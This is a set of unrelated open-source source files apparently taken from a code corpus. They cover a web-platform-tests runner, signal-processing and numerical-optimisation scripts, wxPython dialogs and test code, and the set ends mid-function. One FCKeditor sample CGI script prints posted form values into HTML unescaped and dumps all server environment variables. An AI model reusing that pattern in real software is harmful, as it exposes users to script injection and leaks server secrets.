run_info,
manifest_filters=manifest_filters,
chunk_type=kwargs["chunk_type"],
total_chunks=kwargs["total_chunks"],
chunk_number=kwargs["this_chunk"],
include_https=ssl_enabled,
include_h2=h2_enabled,
include_quic=kwargs["enable_quic"],
skip_timeout=kwargs["skip_timeout"],
skip_implementation_status=kwargs["skip_implementation_status"],
chunker_kwargs=chunker_kwargs)
return run_info, test_loader
def list_test_groups(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for item in sorted(test_loader.groups(kwargs["test_types"])):
print(item)
def list_disabled(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
rv = []
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test_type, tests in iteritems(test_loader.disabled_tests):
for test in tests:
rv.append({"test": test.id, "reason": test.disabled()})
print(json.dumps(rv, indent=2))
def list_tests(test_paths, product, **kwargs):
env.do_delayed_imports(logger, test_paths)
run_info_extras = products.load_product(kwargs["config"], product)[-1](**kwargs)
run_info, test_loader = get_loader(test_paths, product,
run_info_extras=run_info_extras, **kwargs)
for test in test_loader.test_ids:
print(test)
def get_pause_after_test(test_loader, **kwargs):
if kwargs["pause_after_test"] is None:
if kwargs["repeat_until_unexpected"]:
return False
if kwargs["headless"]:
return False
if kwargs["debug_test"]:
return True
tests = test_loader.tests
is_single_testharness = (sum(len(item) for item in itervalues(tests)) == 1 and
len(tests.get("testharness", [])) == 1)
if kwargs["repeat"] == 1 and kwargs["rerun"] == 1 and is_single_testharness:
return True
return False
return kwargs["pause_after_test"]
def run_tests(config, test_paths, product, **kwargs):
"""Set up the test environment, load the list of tests to be executed, and
invoke the remainder of the code to execute tests"""
mp = mpcontext.get_context()
if kwargs["instrument_to_file"] is None:
recorder = instruments.NullInstrument()
else:
recorder = instruments.Instrument(kwargs["instrument_to_file"])
with recorder as recording, capture.CaptureIO(logger,
not kwargs["no_capture_stdio"],
mp_context=mp):
recording.set(["startup"])
env.do_delayed_imports(logger, test_paths)
product = products.load_product(config, product, load_cls=True)
env_extras = product.get_env_extras(**kwargs)
product.check_args(**kwargs)
if kwargs["install_fonts"]:
env_extras.append(FontInstaller(
logger,
font_dir=kwargs["font_dir"],
ahem=os.path.join(test_paths["/"]["tests_path"], "fonts/Ahem.ttf")
))
recording.set(["startup", "load_tests"])
test_groups = (testloader.TestGroupsFile(logger, kwargs["test_groups_file"])
if kwargs["test_groups_file"] else None)
(test_source_cls,
test_source_kwargs,
chunker_kwargs) = testloader.get_test_src(logger=logger,
test_groups=test_groups,
**kwargs)
run_info, test_loader = get_loader(test_paths,
product.name,
run_info_extras=product.run_info_extras(**kwargs),
chunker_kwargs=chunker_kwargs,
test_groups=test_groups,
**kwargs)
logger.info("Using %i client processes" % kwargs["processes"])
skipped_tests = 0
test_total = 0
unexpected_total = 0
if len(test_loader.test_ids) == 0 and kwargs["test_list"]:
logger.critical("Unable to find any tests at the path(s):")
for path in kwargs["test_list"]:
logger.critical(" %s" % path)
logger.critical("Please check spelling and make sure there are tests in the specified path(s).")
return False
kwargs["pause_after_test"] = get_pause_after_test(test_loader, **kwargs)
ssl_config = {"type": kwargs["ssl_type"],
"openssl": {"openssl_binary": kwargs["openssl_binary"]},
"pregenerated": {"host_key_path": kwargs["host_key_path"],
"host_cert_path": kwargs["host_cert_path"],
"ca_cert_path": kwargs["ca_cert_path"]}}
        testharness_timeout_multiplier = product.get_timeout_multiplier("testharness",
                                                                        run_info,
                                                                        **kwargs)
mojojs_path = kwargs["mojojs_path"] if kwargs["enable_mojojs"] else None
recording.set(["startup", "start_environment"])
with env.TestEnvironment(test_paths,
                                 testharness_timeout_multiplier,
kwargs["pause_after_test"],
kwargs["debug_test"],
kwargs["debug_info"],
product.env_options,
ssl_config,
env_extras,
kwargs["enable_quic"],
mojojs_path) as test_environment:
recording.set(["startup", "ensure_environment"])
try:
test_environment.ensure_started()
except env.TestEnvironmentError as e:
logger.critical("Error starting test environment: %s" % e.message)
raise
recording.set(["startup"])
repeat = kwargs["repeat"]
repeat_count = 0
repeat_until_unexpected = kwargs["repeat_until_unexpected"]
while repeat_count < repeat or repeat_until_unexpected:
repeat_count += 1
if repeat_until_unexpected:
logger.info("Repetition %i" % (repeat_count))
elif repeat > 1:
logger.info("Repetition %i / %i" % (repeat_count, repeat))
test_count = 0
unexpected_count = 0
tests = []
for test_type in test_loader.test_types:
tests.extend(test_loader.tests[test_type])
try:
test_groups = test_source_cls.tests_by_group(tests, **test_source_kwargs)
except Exception:
logger.critical("Loading tests failed")
return False
logger.suite_start(test_groups,
name='web-platform-test',
run_info=run_info,
extra={"run_by_dir": kwargs["run_by_dir"]})
for test_type in kwargs["test_types"]:
logger.info("Running %s tests" % test_type)
# WebDriver tests may create and destroy multiple browser
# processes as part of their expected behavior. These
# processes are managed by a WebDriver server binary. This
# obviates the need for wptrunner to provide a browser, so
# the NullBrowser is used in place of the "target" browser
if test_type == "wdspec":
browser_cls = NullBrowser
else:
browser_cls = product.browser_cls
browser_kwargs = product.get_browser_kwargs(logger,
test_type,
run_info,
config=test_environment.config,
num_test_groups=len(test_groups),
**kwargs)
executor_cls = product.executor_classes.get(test_type)
executor_kwargs = product.get_executor_kwargs(logger,
test_type,
test_environment.config,
test_environment.cache_manager,
run_info,
**kwargs)
if executor_cls is None:
logger.error("Unsupported test type %s for product %s" %
(test_type, product.name))
continue
for test in test_loader.disabled_tests[test_type]:
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
if test_type == "testharness":
run_tests = {"testharness": []}
for test in test_loader.tests["testharness"]:
if ((test.testdriver and not executor_cls.supports_testdriver) or
(test.jsshell and not executor_cls.supports_jsshell)):
logger.test_start(test.id)
logger.test_end(test.id, status="SKIP")
skipped_tests += 1
else:
run_tests["testharness"].append(test)
else:
run_tests = test_loader.tests
recording.pause()
with ManagerGroup("web-platform-tests",
kwargs["processes"],
test_source_cls,
test_source_kwargs,
browser_cls,
browser_kwargs,
executor_cls,
executor_kwargs,
kwargs["rerun"],
kwargs["pause_after_test"],
kwargs["pause_on_unexpected"],
kwargs["restart_on_unexpected"],
kwargs["debug_info"],
not kwargs["no_capture_stdio"],
recording=recording) as manager_group:
try:
manager_group.run(test_type, run_tests)
except KeyboardInterrupt:
logger.critical("Main thread got signal")
manager_group.stop()
raise
test_count += manager_group.test_count()
unexpected_count += manager_group.unexpected_count()
recording.set(["after-end"])
test_total += test_count
unexpected_total += unexpected_count
logger.info("Got %i unexpected results" % unexpected_count)
logger.suite_end()
if repeat_until_unexpected and unexpected_total > 0:
break
if repeat_count == 1 and len(test_loader.test_ids) == skipped_tests:
break
if test_total == 0:
if skipped_tests > 0:
logger.warning("All requested tests were skipped")
else:
if kwargs["default_exclude"]:
logger.info("No tests ran")
return True
else:
logger.critical("No tests ran")
return False
if unexpected_total and not kwargs["fail_on_unexpected"]:
logger.info("Tolerating %s unexpected results" % unexpected_total)
return True
return unexpected_total == 0
def check_stability(**kwargs):
from . import stability
if kwargs["stability"]:
logger.warning("--stability is deprecated; please use --verify instead!")
kwargs['verify_max_time'] = None
kwargs['verify_chaos_mode'] = False
kwargs['verify_repeat_loop'] = 0
kwargs['verify_repeat_restart'] = 10 if kwargs['repeat'] == 1 else kwargs['repeat']
kwargs['verify_output_results'] = True
return stability.check_stability(logger,
max_time=kwargs['verify_max_time'],
chaos_mode=kwargs['verify_chaos_mode'],
repeat_loop=kwargs['verify_repeat_loop'],
repeat_restart=kwargs['verify_repeat_restart'],
output_results=kwargs['verify_output_results'],
**kwargs)
def start(**kwargs):
assert logger is not None
logged_critical = wptlogging.LoggedAboveLevelHandler("CRITICAL")
handler = handlers.LogLevelFilter(logged_critical, "CRITICAL")
logger.add_handler(handler)
rv = False
try:
if kwargs["list_test_groups"]:
list_test_groups(**kwargs)
elif kwargs["list_disabled"]:
list_disabled(**kwargs)
elif kwargs["list_tests"]:
list_tests(**kwargs)
elif kwargs["verify"] or kwargs["stability"]:
rv = check_stability(**kwargs) or logged_critical.has_log
else:
rv = not run_tests(**kwargs) or logged_critical.has_log
finally:
logger.remove_handler(handler)
return rv
def main():
"""Main entry point when calling from the command line"""
kwargs = wptcommandline.parse_args()
try:
if kwargs["prefs_root"] is None:
kwargs["prefs_root"] = os.path.abspath(os.path.join(here, "prefs"))
setup_logging(kwargs, {"raw": sys.stdout})
return start(**kwargs)
except Exception:
if kwargs["pdb"]:
import pdb
import traceback
print(traceback.format_exc())
pdb.post_mortem()
else:
raise
| mpl-2.0 |
boddmg/dsp-playground | experiment.py | 1 | 2717 | from matplotlib import pyplot as plt
import numpy as np
import math
import pickle
from scipy import signal
from numpy.fft import rfft, irfft
from numpy import argmax, sqrt, mean, absolute, arange, log10
from scipy.signal import blackmanharris
import thdn
def single_frequency_filter(input_signal):
y_f_all = np.fft.fft(input_signal)
y_f_all[:1] = np.array([0] *1)
    y_f_half = y_f_all[:len(y_f_all) // 2]
y_f_abs = np.abs(y_f_half)
y_f_max = max(y_f_abs)
y_f_max_index = np.where(y_f_abs == y_f_max)[0][0]
print(y_f_max_index)
y_f_all[:y_f_max_index] = [0] * (y_f_max_index)
y_f_all[y_f_max_index+1:] = [0] * (len(y_f_all)-y_f_max_index-1)
y_filtered = np.fft.ifft(y_f_all)
return y_filtered
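# Illustrative check (not part of the original script): passing a noisy tone
# through single_frequency_filter should leave only its dominant spectral line.
# The 1-second duration and 0.3 noise amplitude are arbitrary assumptions.
def _demo_single_frequency_filter():
    t = np.arange(0, 1.0, 1.0 / FS)  # FS and BASE_FREQUENCY are defined just below
    noisy = np.sin(2 * np.pi * BASE_FREQUENCY * t) + 0.3 * np.random.randn(len(t))
    return np.real(single_frequency_filter(noisy))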
FS = 204.8
BASE_FREQUENCY = 50.0
FILTER_SAMPLE_PURE = int(2*1/BASE_FREQUENCY * FS) # 2T
FILTER_SAMPLE_ALL = 2048
DF = FS/FILTER_SAMPLE_ALL
print(DF)
filter_buffer = []
def single_filter(x):
return x
def main():
import json
# get data
data = json.load(open("data.txt", "r"))
# y = np.concatenate((np.load("data.pkl")[:256], np.array([0] * (600 - 256))))
# y = np.concatenate((np.load("data.pkl")[:], [0]*6000))
y = np.array(data["Y"])
# y = signal.resample(y, 5000)
# fs = 5000.0 * (10000/200)
fs = 1 / data["dt"]
print("fs:\t", fs)
time = len(y)/fs # in seconds
x = np.arange(0, time, 1/fs)
# x = x[:-1]
# for i in meta_data:
# print(i, meta_data[i])
print("time",time)
end = 40
f = x[:end]
f = f * fs / time
# Add the noise
# y = y.clip(-10, 7)
# y += (np.sin(x * 5) * 2).clip (-0.3, 0.8)
# y += np.random.uniform(size=len(y))
plt.subplot(231)
plt.plot(x, y, 'r')
plt.subplot(232)
y_filtered = y.tolist()
y_list = y.tolist()
for i in range(len(y_list)):
y_filtered[i] = single_filter(y_list[i])
y_filtered = np.array(y_filtered)
# y_filtered = single_frequency_filter(y)*10
# filter_function = np.array(([0] * 6 + [1] + [0] * (600 - 7)))
# filter_function = np.fft.ifft(filter_function)
# y_filtered = np.fft.ifft(y_f * filter_function)
# y_filtered = np.convolve(y_filtered, filter_function, mode='same')
# y_filtered = np.sin(x*np.pi*2* )*10
plt.plot(x, y_filtered, "b")
plt.subplot(233)
plt.plot(x[:end], y[:end], "r", x[:end], y_filtered[:end], "b")
plt.subplot(234)
y = np.abs(np.fft.fft(y))
y = y[:end]
plt.plot(f, y)
plt.subplot(235)
y_filtered = np.abs(np.fft.fft(y_filtered))
y_filtered = y_filtered[:end]
plt.plot(f, y_filtered)
plt.subplot(236)
plt.plot(f, y, 'r', f, y_filtered, 'b')
plt.show()
if __name__ == '__main__':
main()
| mit |
sidzan/netforce | netforce_general/netforce_general/set_module_version.py | 2 | 1178 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce import set_module_version
set_module_version("3.1.0",115)
| mit |
farra/apachecon-consite | public/javascripts/fckeditor/_samples/py/sampleposteddata.py | 1 | 2067 | #!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2007 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This page lists the data posted by a form.
"""
import cgi
import os
# Tell the browser to render html
print "Content-Type: text/html"
print ""
try:
# Create a cgi object
form = cgi.FieldStorage()
except Exception, e:
print e
# Document header
print """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>FCKeditor - Samples - Posted Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<link href="../sample.css" rel="stylesheet" type="text/css" />
</head>
<body>
"""
# This is the real work
print """
<h1>FCKeditor - Samples - Posted Data</h1>
This page lists all data posted by the form.
<hr>
<table width="100%" border="1" cellspacing="0" bordercolor="#999999">
<tr style="FONT-WEIGHT: bold; COLOR: #dddddd; BACKGROUND-COLOR: #999999">
<td nowrap>Field Name </td>
<td>Value</td>
</tr>
"""
for key in form.keys():
try:
value = form[key].value
print """
<tr>
<td valign="top" nowrap><b>%s</b></td>
<td width="100%%" style="white-space:pre">%s</td>
</tr>
""" % (key, value)
except Exception, e:
print e
print "</table>"
# For testing your environments
print "<hr>"
for key in os.environ.keys():
print "%s: %s<br>" % (key, os.environ.get(key, ""))
print "<hr>"
# Document footer
print """
</body>
</html>
"""
| mit |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Sources/ZMQ/Tools/UI.py | 1 | 5885 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
import wx
from RCP3.Backends.Sources.ZMQ.Tools.RoutersListProvider import GetAvailableRoutersList
class ServerSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress = None):
super(ServerSelectionDialog, self).__init__(parent=None, size=(270, 260))
self._originalServerAddress = currentServerAddress
self.serverAddress = currentServerAddress
self.availableServersList = GetAvailableRoutersList()
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select router address")
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Router address:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue(self.serverAddress if self.serverAddress else "")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 150), self.availableServersList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
refreshButton = wx.Button(self, label='Refresh list')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
hbox.Add(refreshButton, flag=wx.LEFT, border=10)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveNewAddresAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
refreshButton.Bind(wx.EVT_BUTTON, self.RefreshRoutersList)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
self.addressTextCtrl.Bind(wx.EVT_TEXT, self.OnText)
def OnText(self, event):
if self.availableServersList[self.currentlySelectedIdx] != self.addressTextCtrl.GetValue():
self.currentlySelectedIdx = -1
self.listBox.Select(self.currentlySelectedIdx)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
self.addressTextCtrl.SetValue(self.availableServersList[event.GetSelection()])
self.listBox.Select(self.currentlySelectedIdx)
def RefreshRoutersList(self, e=None):
self.availableServersList = GetAvailableRoutersList()
self.listBox.Set(self.availableServersList)
self.listBox.Select(self.currentlySelectedIdx)
def SaveNewAddresAndClose(self, e):
self.serverAddress = self.addressTextCtrl.GetValue()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.serverAddress = self._originalServerAddress
self.Destroy()
class StreamsSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress, currentStreams = []):
super(StreamsSelectionDialog, self).__init__(parent=None, size=(670, 360))
self.serverAddress = currentServerAddress
self._originalStreams = currentStreams
self.streamsList = currentStreams
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select listening streams for "+self.serverAddress)
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Stream name:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue("")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
addButton = wx.Button(self, label='Add')
hbox.Add(addButton, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 250), self.streamsList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
addButton.Bind(wx.EVT_BUTTON, self.OnAddButton)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_KEY_DOWN, self.OnKeyPress)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
def OnAddButton(self, e):
self.listBox.Append(self.addressTextCtrl.GetValue())
pass
def SaveAndClose(self, e):
self.streamsList = self.listBox.GetStrings()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.streamsList = self._originalStreams
self.Destroy()
def OnKeyPress(self, evt):
if evt.GetKeyCode() == wx.WXK_DELETE:
if self.currentlySelectedIdx!=-1:
self.listBox.Delete(self.currentlySelectedIdx) | lgpl-3.0 |
imrandomizer/Algorithm-Implementations | Hamming_Code/Python/AlexMathew/HammingCode.py | 27 | 1830 | """
AUTHOR : Alex Mathew
EMAIL : [email protected]
There is a lot I can do to improve this implementation.
"""
"""For a given binary word, print out its corresponding Hamming Coded word"""
import math
def FindKeyBits(n):
keyBits=[]
pad = int(math.ceil(math.log(n)/math.log(2)))
for i in xrange(1, n+1):
b = "{0:b}".format(i)
b=b.zfill(pad)
keyBits.append(b)
return keyBits
def IsPowerOf2(x):
return ((x&(x-1))==0)
def XOR(a, b):
return str(int(a)^int(b))
def FindParityCount(m):
r = math.ceil((math.log(m)/math.log(2))+1)
return int(r)
def CalculateParity(keyBits, data, parityTrack):
parity = '0'
pbCount = 0
for elem in keyBits:
if not IsPowerOf2(int(elem,2)):
if elem[-parityTrack]=='1':
parity = XOR(parity, data[pbCount-int(elem,2)])
else:
pbCount+=1
return parity
def ComputeHamming(data):
dataLen = len(data)
parityCount = FindParityCount(dataLen)
hammingLen = dataLen + parityCount
keyBits = FindKeyBits(hammingLen)
hammingCode = []
dataTrack = -1
parityTrack = 1
for i in xrange(1, hammingLen+1):
if IsPowerOf2(i):
parity = CalculateParity(keyBits, data, parityTrack)
hammingCode.append(parity)
parityTrack+=1
else:
hammingCode.append(data[dataTrack])
dataTrack-=1
hammingCode.reverse()
for i in hammingCode:
print i,
def main():
print 'The inputs are passed into the HammingCode() function as a string \n'
print '\nSample runs - '
print '\n\nINPUT : 1101'
print 'OUTPUT : '
ComputeHamming('1101')
print '\n\nINPUT : 11011101'
print 'OUTPUT : '
ComputeHamming('11011101')
print '\n\n'
data = raw_input("Enter the word to be encoded : ")
print '\nThe Hamming encoded word for', data, 'is : ',
ComputeHamming(data)
if __name__ == '__main__':
main() | mit |
nachandr/cfme_tests | cfme/tests/perf/workloads/test_idle.py | 2 | 2619 | """Runs Idle Workload by resetting appliance and enabling specific roles with no providers."""
import time
import pytest
from cfme.utils.conf import cfme_performance
from cfme.utils.grafana import get_scenario_dashboard_urls
from cfme.utils.log import logger
from cfme.utils.smem_memory_monitor import add_workload_quantifiers
from cfme.utils.smem_memory_monitor import SmemMemoryMonitor
from cfme.utils.workloads import get_idle_scenarios
def pytest_generate_tests(metafunc):
argvalues = [[scenario] for scenario in get_idle_scenarios()]
idlist = [scenario['name'] for scenario in get_idle_scenarios()]
metafunc.parametrize(['scenario'], argvalues, ids=idlist)
@pytest.mark.usefixtures('generate_version_files')
def test_idle(appliance, request, scenario):
"""Runs an appliance at idle with specific roles turned on for specific amount of time. Memory
Monitor creates graphs and summary at the end of the scenario.
Polarion:
assignee: rhcf3_machine
casecomponent: CandU
initialEstimate: 1/4h
"""
from_ts = int(time.time() * 1000)
logger.debug('Scenario: {}'.format(scenario['name']))
appliance.clean_appliance()
quantifiers = {}
scenario_data = {'appliance_ip': appliance.hostname,
'appliance_name': cfme_performance['appliance']['appliance_name'],
'test_dir': 'workload-idle',
'test_name': 'Idle with {} Roles'.format(scenario['name']),
'appliance_roles': ', '.join(scenario['roles']),
'scenario': scenario}
monitor_thread = SmemMemoryMonitor(appliance.ssh_client(), scenario_data)
def cleanup_workload(from_ts, quantifiers, scenario_data):
starttime = time.time()
to_ts = int(starttime * 1000)
g_urls = get_scenario_dashboard_urls(scenario, from_ts, to_ts)
logger.debug('Started cleaning up monitoring thread.')
monitor_thread.grafana_urls = g_urls
monitor_thread.signal = False
monitor_thread.join()
add_workload_quantifiers(quantifiers, scenario_data)
timediff = time.time() - starttime
logger.info(f'Finished cleaning up monitoring thread in {timediff}')
request.addfinalizer(lambda: cleanup_workload(from_ts, quantifiers, scenario_data))
monitor_thread.start()
appliance.wait_for_miq_server_workers_started(poll_interval=2)
appliance.update_server_roles({role: True for role in scenario['roles']})
s_time = scenario['total_time']
logger.info(f'Idling appliance for {s_time}s')
time.sleep(s_time)
quantifiers['Elapsed_Time'] = s_time
logger.info('Test Ending...')
| gpl-2.0 |
optimizers/nlpy | nlpy/optimize/solvers/nlpy_funnel.py | 3 | 5078 | #!/usr/bin/env python
from nlpy import __version__
from nlpy.model import AmplModel
from nlpy.optimize.solvers.funnel import Funnel, LSTRFunnel, LDFPFunnel, \
StructuredLDFPFunnel
from nlpy.tools.timing import cputime
from optparse import OptionParser
import numpy
import nlpy.tools.logs
import sys, logging, os
# Create root logger.
log = logging.getLogger('funnel')
log.setLevel(logging.INFO)
fmt = logging.Formatter('%(name)-15s %(levelname)-8s %(message)s')
hndlr = logging.StreamHandler(sys.stdout)
hndlr.setFormatter(fmt)
log.addHandler(hndlr)
# Configure the solver logger.
sublogger = logging.getLogger('funnel.solver')
sublogger.setLevel(logging.INFO)
sublogger.addHandler(hndlr)
sublogger.propagate = False
def pass_to_funnel(nlp, **kwargs):
verbose = (kwargs['print_level'] == 2)
qn = kwargs.pop('quasi_newton')
t = cputime()
if qn:
funn = StructuredLDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
# funn = LDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
else:
funn = Funnel(nlp, logger_name='funnel.solver', **kwargs)
t_setup = cputime() - t # Setup time.
funn.solve() #reg=1.0e-8)
return (t_setup, funn)
usage_msg = """%prog [options] problem1 [... problemN]
where problem1 through problemN represent unconstrained nonlinear programs."""
# Define allowed command-line options
parser = OptionParser(usage=usage_msg, version='%prog version ' + __version__)
parser.add_option("-p", "--stop_p", action="store", type="float",
default=1.0e-5, dest="stop_p",
help="Primal stopping tolerance")
parser.add_option("-d", "--stop_d", action="store", type="float",
default=1.0e-5, dest="stop_d",
help="Dual stopping tolerance")
parser.add_option("-q", "--quasi_newton", action="store_true",
default=False, dest="quasi_newton",
help="Use LDFP approximation of Hessian")
parser.add_option("-i", "--iter", action="store", type="int", default=None,
dest="maxit", help="Specify maximum number of iterations")
parser.add_option("-o", "--print_level", action="store", type="int",
default=0, dest="print_level",
help="Print iterations detail (0, 1 or 2)")
# Parse command-line options
(options, args) = parser.parse_args()
# Translate options to input arguments.
opts = {}
if options.maxit is not None:
opts['maxit'] = options.maxit
opts['stop_p'] = options.stop_p
opts['stop_d'] = options.stop_d
opts['quasi_newton'] = options.quasi_newton
opts['print_level'] = options.print_level
# Set printing standards for arrays
numpy.set_printoptions(precision=3, linewidth=80, threshold=10, edgeitems=3)
multiple_problems = len(args) > 1
error = False
if multiple_problems:
# Define formats for output table.
hdrfmt = '%-10s %5s %5s %15s %7s %7s %6s %6s %5s'
hdr = hdrfmt % ('Name','Iter','Feval','Objective','dResid','pResid',
'Setup','Solve','Opt')
lhdr = len(hdr)
fmt = '%-10s %5d %5d %15.8e %7.1e %7.1e %6.2f %6.2f %5s'
log.info(hdr)
log.info('-' * lhdr)
# Solve each problem in turn.
for ProblemName in args:
nlp = AmplModel(ProblemName)
# Check for equality-constrained problem.
n_ineq = nlp.nlowerC + nlp.nupperC + nlp.nrangeC
if nlp.nbounds > 0 or n_ineq > 0:
msg = '%s has %d bounds and %d inequality constraints\n'
log.error(msg % (nlp.name, nlp.nbounds, n_ineq))
error = True
else:
ProblemName = os.path.basename(ProblemName)
if ProblemName[-3:] == '.nl':
ProblemName = ProblemName[:-3]
t_setup, funn = pass_to_funnel(nlp, **opts)
if multiple_problems:
log.info(fmt % (ProblemName, funn.niter, funn.nlp.feval, funn.f,
funn.dResid, funn.pResid,
t_setup, funn.tsolve, funn.optimal))
nlp.close() # Close model.
if not multiple_problems and not error:
# Output final statistics
log.info('--------------------------------')
log.info('Funnel: End of Execution')
log.info(' Problem : %-s' % ProblemName)
log.info(' Number of variables : %-d' % nlp.n)
log.info(' Number of linear constraints : %-d' % nlp.nlin)
log.info(' Number of general constraints: %-d' % (nlp.m - nlp.nlin))
log.info(' Initial/Final Objective : %-g/%-g' % (funn.f0, funn.f))
log.info(' Number of iterations : %-d' % funn.niter)
log.info(' Number of function evals : %-d' % funn.nlp.feval)
log.info(' Number of gradient evals : %-d' % funn.nlp.geval)
#log.info(' Number of Hessian evals : %-d' % funn.nlp.Heval)
log.info(' Number of Hessian matvecs : %-d' % funn.nlp.Hprod)
log.info(' Setup/Solve time : %-gs/%-gs' % (t_setup, funn.tsolve))
log.info(' Total time : %-gs' % (t_setup + funn.tsolve))
log.info('--------------------------------')
| gpl-3.0 |
MostlyOpen/odoo_addons | myo_document/models/document_seq.py | 1 | 3257 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
from datetime import *
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
